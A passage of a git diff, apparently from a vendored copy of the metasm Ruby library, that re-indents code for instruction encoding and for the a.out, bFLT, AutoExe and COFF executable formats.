#{endianness.inspect}" unless [:big, :little].include? endianness + raise(EncodeError, "immediate overflow #{type.inspect} #{Expression[val]} #{(Backtrace::backtrace_str(backtrace) if backtrace)}") if not in_range?(val, type) + s = (0...INT_SIZE[type]/8).map { |i| (val >> (8*i)) & 0xff }.pack('C*') + endianness != :little ? s.reverse : s + end + alias encode_immediate encode_imm + end end class Data - def encode(endianness) - edata = case @data - when :uninitialized - EncodedData.new('', :virtsize => Expression::INT_SIZE[INT_TYPE[@type]]/8) - when String - # db 'foo' => 'foo' # XXX could be optimised, but should not be significant - # dw 'foo' => "f\0o\0o\0" / "\0f\0o\0o" - @data.unpack('C*').inject(EncodedData.new) { |ed, chr| ed << Expression.encode_imm(chr, INT_TYPE[@type], endianness, @backtrace) } - when Expression - @data.encode INT_TYPE[@type], endianness, @backtrace - when Array - @data.inject(EncodedData.new) { |ed, d| ed << d.encode(endianness) } - end + def encode(endianness) + edata = case @data + when :uninitialized + EncodedData.new('', :virtsize => Expression::INT_SIZE[INT_TYPE[@type]]/8) + when String + # db 'foo' => 'foo' # XXX could be optimised, but should not be significant + # dw 'foo' => "f\0o\0o\0" / "\0f\0o\0o" + @data.unpack('C*').inject(EncodedData.new) { |ed, chr| ed << Expression.encode_imm(chr, INT_TYPE[@type], endianness, @backtrace) } + when Expression + @data.encode INT_TYPE[@type], endianness, @backtrace + when Array + @data.inject(EncodedData.new) { |ed, d| ed << d.encode(endianness) } + end - # n times - (0...@count).inject(EncodedData.new) { |ed, cnt| ed << edata } - end + # n times + (0...@count).inject(EncodedData.new) { |ed, cnt| ed << edata } + end end class CPU - # returns an EncodedData or an ary of them - # uses +#parse_arg_valid?+ to find the opcode whose signature matches with the instruction - # uses +encode_instr_op+ (arch-specific) - def encode_instruction(program, i) - errmsg = '' - oplist = opcode_list_byname[i.opname].to_a.find_all { |o| - o.args.length == i.args.length and - o.args.zip(i.args).all? { |f, a| parse_arg_valid?(o, f, a) } - }.map { |op| - begin - encode_instr_op(program, i, op) - rescue EncodeError - errmsg = " (#{$!.message})" - nil - end - }.compact.flatten - raise EncodeError, "no matching opcode found for #{i}#{errmsg}" if oplist.empty? - oplist.each { |ed| ed.reloc.each_value { |v| v.backtrace = i.backtrace } } - oplist - end + # returns an EncodedData or an ary of them + # uses +#parse_arg_valid?+ to find the opcode whose signature matches with the instruction + # uses +encode_instr_op+ (arch-specific) + def encode_instruction(program, i) + errmsg = '' + oplist = opcode_list_byname[i.opname].to_a.find_all { |o| + o.args.length == i.args.length and + o.args.zip(i.args).all? { |f, a| parse_arg_valid?(o, f, a) } + }.map { |op| + begin + encode_instr_op(program, i, op) + rescue EncodeError + errmsg = " (#{$!.message})" + nil + end + }.compact.flatten + raise EncodeError, "no matching opcode found for #{i}#{errmsg}" if oplist.empty? + oplist.each { |ed| ed.reloc.each_value { |v| v.backtrace = i.backtrace } } + oplist + end end end diff --git a/lib/metasm/metasm/exe_format/a_out.rb b/lib/metasm/metasm/exe_format/a_out.rb index 6ec0a514348f3..b43dc568c3a63 100644 --- a/lib/metasm/metasm/exe_format/a_out.rb +++ b/lib/metasm/metasm/exe_format/a_out.rb @@ -9,186 +9,186 @@ module Metasm class AOut < ExeFormat - MAGIC = { 0407 => 'OMAGIC', 0410 => 'NMAGIC', 0413 => 'ZMAGIC', - 0314 => 'QMAGIC', 0421 => 'CMAGIC' - } - MACHINE_TYPE = { 0 => 'OLDSUN2', 1 => '68010', 2 => '68020', - 3 => 'SPARC', 100 => 'PC386', 134 => 'I386', 135 => 'M68K', - 136 => 'M68K4K', 137 => 'NS32532', 138 => 'SPARC', - 139 => 'PMAX', 140 => 'VAX', 141 => 'ALPHA', 142 => 'MIPS', - 143 => 'ARM6', 151 => 'MIPS1', 152 => 'MIPS2', 300 => 'HP300', - 0x20B => 'HPUX800', 0x20C => 'HPUX' - } - FLAGS = { 0x10 => 'PIC', 0x20 => 'DYNAMIC' } - SYMBOL_TYPE = { 0 => 'UNDF', 1 => 'ABS', 2 => 'TEXT', - 3 => 'DATA', 4 => 'BSS', 5 => 'INDR', 6 => 'SIZE', - 9 => 'COMM', 10=> 'SETA', 11=> 'SETT', 12=> 'SETD', - 13=> 'SETB', 14=> 'SETV', 15=> 'FN' - } - - attr_accessor :endianness, :header, :text, :data, :symbols, :textrel, :datarel - - class Header < SerialStruct - bitfield :word, 0 => :magic, 16 => :machtype, 24 => :flags - fld_enum(:magic, MAGIC) - fld_enum(:machtype, MACHINE_TYPE) - fld_bits(:flags, FLAGS) - words :text, :data, :bss, :syms, :entry, :trsz, :drsz - - def decode(aout) - super(aout) - - case @magic - when 'OMAGIC', 'NMAGIC', 'ZMAGIC', 'QMAGIC' - else raise InvalidExeFormat, "Bad A.OUT signature #@magic" - end - end - - def set_default_values(aout) - @magic ||= 'QMAGIC' - @machtype ||= 'PC386' - @flags ||= [] - @text ||= aout.text.length + (@magic == 'QMAGIC' ? 32 : 0) if aout.text - @data ||= aout.data.length if aout.data - - super(aout) - end - end - - class Relocation < SerialStruct - word :address - bitfield :word, 0 => :symbolnum, 24 => :pcrel, 25 => :length, + MAGIC = { 0407 => 'OMAGIC', 0410 => 'NMAGIC', 0413 => 'ZMAGIC', + 0314 => 'QMAGIC', 0421 => 'CMAGIC' + } + MACHINE_TYPE = { 0 => 'OLDSUN2', 1 => '68010', 2 => '68020', + 3 => 'SPARC', 100 => 'PC386', 134 => 'I386', 135 => 'M68K', + 136 => 'M68K4K', 137 => 'NS32532', 138 => 'SPARC', + 139 => 'PMAX', 140 => 'VAX', 141 => 'ALPHA', 142 => 'MIPS', + 143 => 'ARM6', 151 => 'MIPS1', 152 => 'MIPS2', 300 => 'HP300', + 0x20B => 'HPUX800', 0x20C => 'HPUX' + } + FLAGS = { 0x10 => 'PIC', 0x20 => 'DYNAMIC' } + SYMBOL_TYPE = { 0 => 'UNDF', 1 => 'ABS', 2 => 'TEXT', + 3 => 'DATA', 4 => 'BSS', 5 => 'INDR', 6 => 'SIZE', + 9 => 'COMM', 10=> 'SETA', 11=> 'SETT', 12=> 'SETD', + 13=> 'SETB', 14=> 'SETV', 15=> 'FN' + } + + attr_accessor :endianness, :header, :text, :data, :symbols, :textrel, :datarel + + class Header < SerialStruct + bitfield :word, 0 => :magic, 16 => :machtype, 24 => :flags + fld_enum(:magic, MAGIC) + fld_enum(:machtype, MACHINE_TYPE) + fld_bits(:flags, FLAGS) + words :text, :data, :bss, :syms, :entry, :trsz, :drsz + + def decode(aout) + super(aout) + + case @magic + when 'OMAGIC', 'NMAGIC', 'ZMAGIC', 'QMAGIC' + else raise InvalidExeFormat, "Bad A.OUT signature #@magic" + end + end + + def set_default_values(aout) + @magic ||= 'QMAGIC' + @machtype ||= 'PC386' + @flags ||= [] + @text ||= aout.text.length + (@magic == 'QMAGIC' ? 32 : 0) if aout.text + @data ||= aout.data.length if aout.data + + super(aout) + end + end + + class Relocation < SerialStruct + word :address + bitfield :word, 0 => :symbolnum, 24 => :pcrel, 25 => :length, 27 => :extern, 28 => :baserel, 29 => :jmptable, 30 => :relative, 31 => :rtcopy - fld_enum :length, 0 => 1, 1 => 2, 2 => 4, 3 => 8 - fld_default :length, 4 - end - - class Symbol < SerialStruct - word :name_p - bitfield :byte, 0 => :extern, 1 => :type, 5 => :stab - byte :other - half :desc + fld_enum :length, 0 => 1, 1 => 2, 2 => 4, 3 => 8 + fld_default :length, 4 + end + + class Symbol < SerialStruct + word :name_p + bitfield :byte, 0 => :extern, 1 => :type, 5 => :stab + byte :other + half :desc word :value - attr_accessor :name - - def decode(aout, strings=nil) - super(aout) - @name = strings[@name_p...(strings.index(?\0, @name_p))] if strings - end - - def set_default_values(aout, strings=nil) - if strings and name and @name != '' - if not @name_p or strings[@name_p, @name.length] != @name - @name_p = strings.length - strings << @name << 0 - end - end - super(aout, strings) - end - end - - def decode_byte(edata = @encoded) edata.decode_imm(:u8 , @endianness) end - def decode_half(edata = @encoded) edata.decode_imm(:u16, @endianness) end - def decode_word(edata = @encoded) edata.decode_imm(:u32, @endianness) end - def encode_byte(w) Expression[w].encode(:u8 , @endianness) end - def encode_half(w) Expression[w].encode(:u16, @endianness) end - def encode_word(w) Expression[w].encode(:u32, @endianness) end - - def initialize(cpu = nil) - @endianness = cpu ? cpu.endianness : :little - @header = Header.new - @text = EncodedData.new - @data = EncodedData.new - super(cpu) - end - - def decode_header - @encoded.ptr = 0 - @header.decode(self) - end - - def decode - decode_header - - tlen = @header.text - case @header.magic - when 'ZMAGIC'; @encoded.ptr = 1024 - when 'QMAGIC'; tlen -= 32 # header is included in .text - end - @text = EncodedData.new << @encoded.read(tlen) - - @data = EncodedData.new << @encoded.read(@header.data) - - textrel = @encoded.read @header.trsz - datarel = @encoded.read @header.drsz - syms = @encoded.read @header.syms - strings = @encoded.read - # TODO - end - - def encode - # non mmapable on linux anyway - # could support OMAGIC.. - raise EncodeError, 'cannot encode non-QMAGIC a.out' if @header.magic and @header.magic != 'QMAGIC' - - # data must be 4096-aligned - # 32 bytes of header included in .text - @text.virtsize = (@text.virtsize + 32 + 4096 - 1) / 4096 * 4096 - 32 - if @data.rawsize % 4096 != 0 - @data[(@data.rawsize + 4096 - 1) / 4096 * 4096 - 1] = 0 - end - - @header.text = @text.length+32 - @header.data = @data.rawsize - @header.bss = @data.virtsize - @data.rawsize - - @encoded = EncodedData.new - @encoded << @header.encode(self) - binding = @text.binding(4096+32).merge @data.binding(4096 + @header.text) - @encoded << @text << @data - @encoded.fixup! binding - @encoded.data - end - - def parse_init - @textsrc ||= [] - @datasrc ||= [] - @cursource ||= @textsrc - super() - end - - def parse_parser_instruction(instr) - case instr.raw.downcase - when '.text'; @cursource = @textsrc - when '.data'; @cursource = @datasrc - when '.entrypoint' - # ".entrypoint " or ".entrypoint" (here) - @lexer.skip_space - if tok = @lexer.nexttok and tok.type == :string - raise instr if not entrypoint = Expression.parse(@lexer) - else - entrypoint = new_label('entrypoint') - @cursource << Label.new(entrypoint, instr.backtrace.dup) - end - @header.entry = entrypoint - else super(instr) - end - end - - def assemble(*a) - parse(*a) if not a.empty? - @text << assemble_sequence(@textsrc, @cpu) - @textsrc.clear - @data << assemble_sequence(@datasrc, @cpu) - @datasrc.clear - self - end - - def each_section - tva = 0 - tva = 4096+32 if @header.magic == 'QMAGIC' - yield @text, tva - yield @data, tva + @text.virtsize - end + attr_accessor :name + + def decode(aout, strings=nil) + super(aout) + @name = strings[@name_p...(strings.index(?\0, @name_p))] if strings + end + + def set_default_values(aout, strings=nil) + if strings and name and @name != '' + if not @name_p or strings[@name_p, @name.length] != @name + @name_p = strings.length + strings << @name << 0 + end + end + super(aout, strings) + end + end + + def decode_byte(edata = @encoded) edata.decode_imm(:u8 , @endianness) end + def decode_half(edata = @encoded) edata.decode_imm(:u16, @endianness) end + def decode_word(edata = @encoded) edata.decode_imm(:u32, @endianness) end + def encode_byte(w) Expression[w].encode(:u8 , @endianness) end + def encode_half(w) Expression[w].encode(:u16, @endianness) end + def encode_word(w) Expression[w].encode(:u32, @endianness) end + + def initialize(cpu = nil) + @endianness = cpu ? cpu.endianness : :little + @header = Header.new + @text = EncodedData.new + @data = EncodedData.new + super(cpu) + end + + def decode_header + @encoded.ptr = 0 + @header.decode(self) + end + + def decode + decode_header + + tlen = @header.text + case @header.magic + when 'ZMAGIC'; @encoded.ptr = 1024 + when 'QMAGIC'; tlen -= 32 # header is included in .text + end + @text = EncodedData.new << @encoded.read(tlen) + + @data = EncodedData.new << @encoded.read(@header.data) + + textrel = @encoded.read @header.trsz + datarel = @encoded.read @header.drsz + syms = @encoded.read @header.syms + strings = @encoded.read + # TODO + end + + def encode + # non mmapable on linux anyway + # could support OMAGIC.. + raise EncodeError, 'cannot encode non-QMAGIC a.out' if @header.magic and @header.magic != 'QMAGIC' + + # data must be 4096-aligned + # 32 bytes of header included in .text + @text.virtsize = (@text.virtsize + 32 + 4096 - 1) / 4096 * 4096 - 32 + if @data.rawsize % 4096 != 0 + @data[(@data.rawsize + 4096 - 1) / 4096 * 4096 - 1] = 0 + end + + @header.text = @text.length+32 + @header.data = @data.rawsize + @header.bss = @data.virtsize - @data.rawsize + + @encoded = EncodedData.new + @encoded << @header.encode(self) + binding = @text.binding(4096+32).merge @data.binding(4096 + @header.text) + @encoded << @text << @data + @encoded.fixup! binding + @encoded.data + end + + def parse_init + @textsrc ||= [] + @datasrc ||= [] + @cursource ||= @textsrc + super() + end + + def parse_parser_instruction(instr) + case instr.raw.downcase + when '.text'; @cursource = @textsrc + when '.data'; @cursource = @datasrc + when '.entrypoint' + # ".entrypoint " or ".entrypoint" (here) + @lexer.skip_space + if tok = @lexer.nexttok and tok.type == :string + raise instr if not entrypoint = Expression.parse(@lexer) + else + entrypoint = new_label('entrypoint') + @cursource << Label.new(entrypoint, instr.backtrace.dup) + end + @header.entry = entrypoint + else super(instr) + end + end + + def assemble(*a) + parse(*a) if not a.empty? + @text << assemble_sequence(@textsrc, @cpu) + @textsrc.clear + @data << assemble_sequence(@datasrc, @cpu) + @datasrc.clear + self + end + + def each_section + tva = 0 + tva = 4096+32 if @header.magic == 'QMAGIC' + yield @text, tva + yield @data, tva + @text.virtsize + end end end diff --git a/lib/metasm/metasm/exe_format/autoexe.rb b/lib/metasm/metasm/exe_format/autoexe.rb index cc0d4bf835ea6..6e3eb634451eb 100644 --- a/lib/metasm/metasm/exe_format/autoexe.rb +++ b/lib/metasm/metasm/exe_format/autoexe.rb @@ -13,40 +13,40 @@ class UnknownSignature < InvalidExeFormat ; end # actually calls autoexe_load for the detected filetype from #execlass_from_signature def self.load(str, *a, &b) - s = str - s = str.data if s.kind_of? EncodedData - execlass_from_signature(s).autoexe_load(str, *a, &b) + s = str + s = str.data if s.kind_of? EncodedData + execlass_from_signature(s).autoexe_load(str, *a, &b) end # match the actual exe class from the raw file inspection using the registered signature list # calls #unknown_signature if nothing matches def self.execlass_from_signature(raw) - m = @signatures.find { |sig, exe| - case sig - when String; raw[0, sig.length] == sig - when Proc; sig[raw] - end - } - e = m ? m[1] : unknown_signature(raw) - case e - when String; Metasm.const_get(e) - when Proc; e.call - else e - end + m = @signatures.find { |sig, exe| + case sig + when String; raw[0, sig.length] == sig + when Proc; sig[raw] + end + } + e = m ? m[1] : unknown_signature(raw) + case e + when String; Metasm.const_get(e) + when Proc; e.call + else e + end end # register a new binary file signature def self.register_signature(sig, exe=nil, &b) - (@signatures ||= []) << [sig, exe || b] + (@signatures ||= []) << [sig, exe || b] end def self.init_signatures(sig=[]) - @signatures = sig + @signatures = sig end # this function is called when no signature matches def self.unknown_signature(raw) - raise UnknownSignature, "unrecognized executable file format #{raw[0, 4].unpack('H*').first.inspect}" + raise UnknownSignature, "unrecognized executable file format #{raw[0, 4].unpack('H*').first.inspect}" end # raw signature copies (avoid triggering exefmt autorequire) @@ -62,14 +62,14 @@ def self.unknown_signature(raw) # replacement for AutoExe where #load defaults to a Shellcode of the specified CPU def self.orshellcode(cpu=nil, &b) - # here we create an anonymous subclass of AutoExe whose #unknown_sig is patched to return a Shellcode instead of raise()ing - c = ::Class.new(self) - # yeeehaa - class << c ; self ; end.send(:define_method, :unknown_signature) { |raw| - Shellcode.withcpu(cpu || b[raw]) - } - c.init_signatures @signatures - c + # here we create an anonymous subclass of AutoExe whose #unknown_sig is patched to return a Shellcode instead of raise()ing + c = ::Class.new(self) + # yeeehaa + class << c ; self ; end.send(:define_method, :unknown_signature) { |raw| + Shellcode.withcpu(cpu || b[raw]) + } + c.init_signatures @signatures + c end end diff --git a/lib/metasm/metasm/exe_format/bflt.rb b/lib/metasm/metasm/exe_format/bflt.rb index b83318cb9707c..f64b6f6406966 100644 --- a/lib/metasm/metasm/exe_format/bflt.rb +++ b/lib/metasm/metasm/exe_format/bflt.rb @@ -10,180 +10,180 @@ module Metasm # BFLT is the binary flat format used by the uClinux class Bflt < ExeFormat - MAGIC = 'bFLT' - FLAGS = { 1 => 'RAM', 2 => 'GOTPIC', 4 => 'GZIP' } - - attr_accessor :header, :text, :data, :reloc, :got - - class Header < SerialStruct - mem :magic, 4 - words :rev, :entry, :data_start, :data_end, :bss_end, :stack_size, - :reloc_start, :reloc_count, :flags - mem :pad, 6*4 - fld_bits(:flags, FLAGS) - - def decode(exe) - super(exe) - - case @magic - when MAGIC - else raise InvalidExeFormat, "Bad bFLT signature #@magic" - end - end - - def set_default_values(exe) - @magic ||= MAGIC - @rev ||= 4 - @entry ||= 0x40 - @data_start ||= @entry + exe.text.length if exe.text - @data_end ||= @data_start + exe.data.data.length if exe.data - @bss_end ||= @data_start + exe.data.length if exe.data - @stack_size ||= 0x1000 - @reloc_start ||= @data_end - @reloc_count ||= exe.reloc.length - @flags ||= [] - - super(exe) - end - end - - def decode_word(edata = @encoded) edata.decode_imm(:u32, @endianness) end - def encode_word(w) Expression[w].encode(:u32, @endianness) end - - def initialize(cpu = nil) - @endianness = cpu ? cpu.endianness : :little - @header = Header.new - @text = EncodedData.new - @data = EncodedData.new - super(cpu) - end - - def decode_header - @encoded.ptr = 0 - @header.decode(self) - end - - def decode - decode_header - - @encoded.ptr = @header.entry - @text = EncodedData.new << @encoded.read(@header.data_start - @header.entry) - @data = EncodedData.new << @encoded.read(@header.data_end - @header.data_start) - @data.virtsize += (@header.bss_end - @header.data_end) - - if @header.flags.include? 'GZIP' - # TODO gzip - raise 'bFLT decoder: gzip format not supported' - end - - @reloc = [] - @encoded.ptr = @header.reloc_start - @header.reloc_count.times { @reloc << decode_word } - if @header.version == 2 - @reloc.map! { |r| r & 0x3fff_ffff } - end - - decode_interpret_relocs - end - - def decode_interpret_relocs - @reloc.each { |r| - # where the reloc is - if r >= @header.entry and r < @header.data_start - section = @text - base = @header.entry - elsif r >= @header.data_start and r < @header.data_end - section = @data - base = @header.data_start - else - puts "out of bounds reloc at #{Expression[r]}" if $VERBOSE - next - end - - # what it points to - section.ptr = r-base - target = decode_word(section) - if target >= @header.entry and target < @header.data_start - target = label_at(@text, target - @header.entry, "xref_#{Expression[target]}") - elsif target >= @header.data_start and target < @header.bss_end - target = label_at(@data, target - @header.data_start, "xref_#{Expression[target]}") - else - puts "out of bounds reloc target at #{Expression[r]}" if $VERBOSE - next - end - - @text.reloc[r-base] = Relocation.new(Expression[target], :u32, @endianness) - } - end - - def encode - create_relocation_table - - # TODO got, gzip - if @header.flags.include? 'GZIP' - puts "W: bFLT: clearing gzip flag" if $VERBOSE - @header.flags.delete 'GZIP' - end - - @encoded = EncodedData.new - @encoded << @header.encode(self) - - binding = @text.binding(@header.entry).merge(@data.binding(@header.data_start)) - @encoded << @text << @data.data - @encoded.fixup! binding - @encoded.reloc.clear - - @relocs.each { |r| @encoded << encode_word(r) } - - @encoded.data - end - - def create_relocation_table - @reloc = [] - mapaddr = new_label('mapaddr') - binding = @text.binding(mapaddr).merge(@data.binding(mapaddr)) - [@text, @data].each { |section| - base = @header.entry || 0x40 - base = @header.data_start || base+@text.length if section == @data - section.reloc.each { |o, r| - if r.endianness == @endianness and [:u32, :a32, :i32].include? r.type and - Expression[r.target.bind(binding), :-, mapaddr].reduce.kind_of? ::Integer - @reloc << (base+o) - else - puts "bFLT: ignoring unsupported reloc #{r.inspect} at #{Expression[o]}" if $VERBOSE - end - } - } - end - - def parse_init - @textsrc ||= [] - @datasrc ||= [] - @cursource ||= @textsrc - super() - end - - def parse_parser_instruction(instr) - case instr.raw.downcase - when '.text'; @cursource = @textsrc - when '.data'; @cursource = @datasrc - # entrypoint is the 1st byte of .text - else super(instr) - end - end - - def assemble(*a) - parse(*a) if not a.empty? - @text << assemble_sequence(@textsrc, @cpu) - @textsrc.clear - @data << assemble_sequence(@datasrc, @cpu) - @datasrc.clear - self - end - - def each_section - yield @text, @header.entry - yield @data, @header.data_start - end + MAGIC = 'bFLT' + FLAGS = { 1 => 'RAM', 2 => 'GOTPIC', 4 => 'GZIP' } + + attr_accessor :header, :text, :data, :reloc, :got + + class Header < SerialStruct + mem :magic, 4 + words :rev, :entry, :data_start, :data_end, :bss_end, :stack_size, + :reloc_start, :reloc_count, :flags + mem :pad, 6*4 + fld_bits(:flags, FLAGS) + + def decode(exe) + super(exe) + + case @magic + when MAGIC + else raise InvalidExeFormat, "Bad bFLT signature #@magic" + end + end + + def set_default_values(exe) + @magic ||= MAGIC + @rev ||= 4 + @entry ||= 0x40 + @data_start ||= @entry + exe.text.length if exe.text + @data_end ||= @data_start + exe.data.data.length if exe.data + @bss_end ||= @data_start + exe.data.length if exe.data + @stack_size ||= 0x1000 + @reloc_start ||= @data_end + @reloc_count ||= exe.reloc.length + @flags ||= [] + + super(exe) + end + end + + def decode_word(edata = @encoded) edata.decode_imm(:u32, @endianness) end + def encode_word(w) Expression[w].encode(:u32, @endianness) end + + def initialize(cpu = nil) + @endianness = cpu ? cpu.endianness : :little + @header = Header.new + @text = EncodedData.new + @data = EncodedData.new + super(cpu) + end + + def decode_header + @encoded.ptr = 0 + @header.decode(self) + end + + def decode + decode_header + + @encoded.ptr = @header.entry + @text = EncodedData.new << @encoded.read(@header.data_start - @header.entry) + @data = EncodedData.new << @encoded.read(@header.data_end - @header.data_start) + @data.virtsize += (@header.bss_end - @header.data_end) + + if @header.flags.include? 'GZIP' + # TODO gzip + raise 'bFLT decoder: gzip format not supported' + end + + @reloc = [] + @encoded.ptr = @header.reloc_start + @header.reloc_count.times { @reloc << decode_word } + if @header.version == 2 + @reloc.map! { |r| r & 0x3fff_ffff } + end + + decode_interpret_relocs + end + + def decode_interpret_relocs + @reloc.each { |r| + # where the reloc is + if r >= @header.entry and r < @header.data_start + section = @text + base = @header.entry + elsif r >= @header.data_start and r < @header.data_end + section = @data + base = @header.data_start + else + puts "out of bounds reloc at #{Expression[r]}" if $VERBOSE + next + end + + # what it points to + section.ptr = r-base + target = decode_word(section) + if target >= @header.entry and target < @header.data_start + target = label_at(@text, target - @header.entry, "xref_#{Expression[target]}") + elsif target >= @header.data_start and target < @header.bss_end + target = label_at(@data, target - @header.data_start, "xref_#{Expression[target]}") + else + puts "out of bounds reloc target at #{Expression[r]}" if $VERBOSE + next + end + + @text.reloc[r-base] = Relocation.new(Expression[target], :u32, @endianness) + } + end + + def encode + create_relocation_table + + # TODO got, gzip + if @header.flags.include? 'GZIP' + puts "W: bFLT: clearing gzip flag" if $VERBOSE + @header.flags.delete 'GZIP' + end + + @encoded = EncodedData.new + @encoded << @header.encode(self) + + binding = @text.binding(@header.entry).merge(@data.binding(@header.data_start)) + @encoded << @text << @data.data + @encoded.fixup! binding + @encoded.reloc.clear + + @relocs.each { |r| @encoded << encode_word(r) } + + @encoded.data + end + + def create_relocation_table + @reloc = [] + mapaddr = new_label('mapaddr') + binding = @text.binding(mapaddr).merge(@data.binding(mapaddr)) + [@text, @data].each { |section| + base = @header.entry || 0x40 + base = @header.data_start || base+@text.length if section == @data + section.reloc.each { |o, r| + if r.endianness == @endianness and [:u32, :a32, :i32].include? r.type and + Expression[r.target.bind(binding), :-, mapaddr].reduce.kind_of? ::Integer + @reloc << (base+o) + else + puts "bFLT: ignoring unsupported reloc #{r.inspect} at #{Expression[o]}" if $VERBOSE + end + } + } + end + + def parse_init + @textsrc ||= [] + @datasrc ||= [] + @cursource ||= @textsrc + super() + end + + def parse_parser_instruction(instr) + case instr.raw.downcase + when '.text'; @cursource = @textsrc + when '.data'; @cursource = @datasrc + # entrypoint is the 1st byte of .text + else super(instr) + end + end + + def assemble(*a) + parse(*a) if not a.empty? + @text << assemble_sequence(@textsrc, @cpu) + @textsrc.clear + @data << assemble_sequence(@datasrc, @cpu) + @datasrc.clear + self + end + + def each_section + yield @text, @header.entry + yield @data, @header.data_start + end end end diff --git a/lib/metasm/metasm/exe_format/coff.rb b/lib/metasm/metasm/exe_format/coff.rb index 9b638d321ad10..05ef3cc7ee391 100644 --- a/lib/metasm/metasm/exe_format/coff.rb +++ b/lib/metasm/metasm/exe_format/coff.rb @@ -10,444 +10,444 @@ module Metasm # the COFF object file format # mostly used on windows (PE/COFF) class COFF < ExeFormat - CHARACTERISTIC_BITS = { - 0x0001 => 'RELOCS_STRIPPED', 0x0002 => 'EXECUTABLE_IMAGE', - 0x0004 => 'LINE_NUMS_STRIPPED', 0x0008 => 'LOCAL_SYMS_STRIPPED', - 0x0010 => 'AGGRESSIVE_WS_TRIM', 0x0020 => 'LARGE_ADDRESS_AWARE', - 0x0040 => 'x16BIT_MACHINE', 0x0080 => 'BYTES_REVERSED_LO', - 0x0100 => 'x32BIT_MACHINE', 0x0200 => 'DEBUG_STRIPPED', - 0x0400 => 'REMOVABLE_RUN_FROM_SWAP', 0x0800 => 'NET_RUN_FROM_SWAP', - 0x1000 => 'SYSTEM', 0x2000 => 'DLL', - 0x4000 => 'UP_SYSTEM_ONLY', 0x8000 => 'BYTES_REVERSED_HI' - } - - MACHINE = { - 0x0 => 'UNKNOWN', 0x184 => 'ALPHA', 0x1c0 => 'ARM', - 0x1d3 => 'AM33', 0x8664=> 'AMD64', 0xebc => 'EBC', - 0x9041=> 'M32R', 0x1f1 => 'POWERPCFP', - 0x284 => 'ALPHA64', 0x14c => 'I386', 0x200 => 'IA64', - 0x268 => 'M68K', 0x266 => 'MIPS16', 0x366 => 'MIPSFPU', - 0x466 => 'MIPSFPU16', 0x1f0 => 'POWERPC', 0x162 => 'R3000', - 0x166 => 'R4000', 0x168 => 'R10000', 0x1a2 => 'SH3', - 0x1a3 => 'SH3DSP', 0x1a6 => 'SH4', 0x1a8 => 'SH5', - 0x1c2 => 'THUMB', 0x169 => 'WCEMIPSV2' - } - - # PE+ is for 64bits address spaces - SIGNATURE = { 0x10b => 'PE', 0x20b => 'PE+', 0x107 => 'ROM' } - - SUBSYSTEM = { - 0 => 'UNKNOWN', 1 => 'NATIVE', 2 => 'WINDOWS_GUI', - 3 => 'WINDOWS_CUI', 5 => 'OS/2_CUI', 7 => 'POSIX_CUI', - 8 => 'WIN9X_DRIVER', 9 => 'WINDOWS_CE_GUI', - 10 => 'EFI_APPLICATION', - 11 => 'EFI_BOOT_SERVICE_DRIVER', 12 => 'EFI_RUNTIME_DRIVER', - 13 => 'EFI_ROM', 14 => 'XBOX' - } - - DLL_CHARACTERISTIC_BITS = { - 0x40 => 'DYNAMIC_BASE', 0x80 => 'FORCE_INTEGRITY', 0x100 => 'NX_COMPAT', - 0x200 => 'NO_ISOLATION', 0x400 => 'NO_SEH', 0x800 => 'NO_BIND', - 0x2000 => 'WDM_DRIVER', 0x8000 => 'TERMINAL_SERVER_AWARE' - } - - BASE_RELOCATION_TYPE = { 0 => 'ABSOLUTE', 1 => 'HIGH', 2 => 'LOW', 3 => 'HIGHLOW', - 4 => 'HIGHADJ', 5 => 'MIPS_JMPADDR', 9 => 'MIPS_JMPADDR16', 10 => 'DIR64' - } - - RELOCATION_TYPE = Hash.new({}).merge( - 'AMD64' => { 0 => 'ABSOLUTE', 1 => 'ADDR64', 2 => 'ADDR32', 3 => 'ADDR32NB', - 4 => 'REL32', 5 => 'REL32_1', 6 => 'REL32_2', 7 => 'REL32_3', - 8 => 'REL32_4', 9 => 'REL32_5', 10 => 'SECTION', 11 => 'SECREL', - 12 => 'SECREL7', 13 => 'TOKEN', 14 => 'SREL32', 15 => 'PAIR', - 16 => 'SSPAN32' }, - 'ARM' => { 0 => 'ABSOLUTE', 1 => 'ADDR32', 2 => 'ADDR32NB', 3 => 'BRANCH24', - 4 => 'BRANCH11', 14 => 'SECTION', 15 => 'SECREL' }, - 'I386' => { 0 => 'ABSOLUTE', 1 => 'DIR16', 2 => 'REL16', 6 => 'DIR32', - 7 => 'DIR32NB', 9 => 'SEG12', 10 => 'SECTION', 11 => 'SECREL', - 12 => 'TOKEN', 13 => 'SECREL7', 20 => 'REL32' } - ) - - # lsb of symbol type, unused - SYMBOL_BTYPE = { 0 => 'NULL', 1 => 'VOID', 2 => 'CHAR', 3 => 'SHORT', - 4 => 'INT', 5 => 'LONG', 6 => 'FLOAT', 7 => 'DOUBLE', 8 => 'STRUCT', - 9 => 'UNION', 10 => 'ENUM', 11 => 'MOE', 12 => 'BYTE', 13 => 'WORD', - 14 => 'UINT', 15 => 'DWORD'} - SYMBOL_TYPE = { 0 => 'NULL', 1 => 'POINTER', 2 => 'FUNCTION', 3 => 'ARRAY' } - SYMBOL_SECTION = { 0 => 'UNDEF', 0xffff => 'ABS', 0xfffe => 'DEBUG' } - SYMBOL_STORAGE = { 0xff => 'EOF', 0 => 'NULL', 1 => 'AUTO', 2 => 'EXTERNAL', - 3 => 'STATIC', 4 => 'REGISTER', 5 => 'EXT_DEF', 6 => 'LABEL', - 7 => 'UNDEF_LABEL', 8 => 'STRUCT_MEMBER', 9 => 'ARGUMENT', 10 => 'STRUCT_TAG', - 11 => 'UNION_MEMBER', 12 => 'UNION_TAG', 13 => 'TYPEDEF', 14 => 'UNDEF_STATIC', - 15 => 'ENUM_TAG', 16 => 'ENUM_MEMBER', 17 => 'REG_PARAM', 18 => 'BIT_FIELD', - 100 => 'BLOCK', 101 => 'FUNCTION', 102 => 'END_STRUCT', - 103 => 'FILE', 104 => 'SECTION', 105 => 'WEAK_EXT', - } - - DEBUG_TYPE = { 0 => 'UNKNOWN', 1 => 'COFF', 2 => 'CODEVIEW', 3 => 'FPO', 4 => 'MISC', - 5 => 'EXCEPTION', 6 => 'FIXUP', 7 => 'OMAP_TO_SRC', 8 => 'OMAP_FROM_SRC', - 9 => 'BORLAND', 10 => 'RESERVED10', 11 => 'CLSID' } - - DIRECTORIES = %w[export_table import_table resource_table exception_table certificate_table - base_relocation_table debug architecture global_ptr tls_table load_config - bound_import iat delay_import com_runtime reserved] - - SECTION_CHARACTERISTIC_BITS = { - 0x20 => 'CONTAINS_CODE', 0x40 => 'CONTAINS_DATA', 0x80 => 